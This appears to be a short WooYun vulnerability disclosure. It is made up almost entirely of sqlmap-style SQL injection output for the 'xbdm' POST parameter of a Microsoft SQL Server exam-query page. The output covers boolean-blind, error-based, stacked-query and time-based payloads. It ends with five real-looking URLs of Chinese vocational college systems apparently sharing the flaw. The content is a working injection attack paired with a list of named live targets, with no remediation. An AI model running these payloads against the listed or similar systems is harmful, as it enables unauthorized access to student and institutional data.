WooYun.org

测试：
POST包：Place: POST
Parameter: xbdm
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: bksj=88952634&cxbh=88952634&bkkc=88952634&xbdm=01 ' AND 5187=5187 A
ND 'RhUr'='RhUr
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: bksj=88952634&cxbh=88952634&bkkc=88952634&xbdm=01 ' AND 1751=CONVER
T(INT,(SELECT CHAR(113)+CHAR(111)+CHAR(103)+CHAR(104)+CHAR(113)+(SELECT (CASE WH
EN (1751=1751) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(99)+CHAR(106)+CH
AR(100)+CHAR(113))) AND 'rSgJ'='rSgJ
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: bksj=88952634&cxbh=88952634&bkkc=88952634&xbdm=01 '; WAITFOR DELAY
'0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: bksj=88952634&cxbh=88952634&bkkc=88952634&xbdm=01 ' WAITFOR DELAY '
0:0:5'--
常州工程职业技术学院：http://jwcx.czie.net/qmkscx_reg.asp

泰州职业技术学院：http://jwxt.tzpc.edu.cn/qmkscx_reg.asp

江海职业技术学院：http://jwgl.jhu.cn/qmkscx_reg.asp

苏州信息职业技术学院：http://szitu.cn:86/qmkscx_reg.asp

宿迁职业技术学院：http://222.187.199.60/qmkscx_reg.asp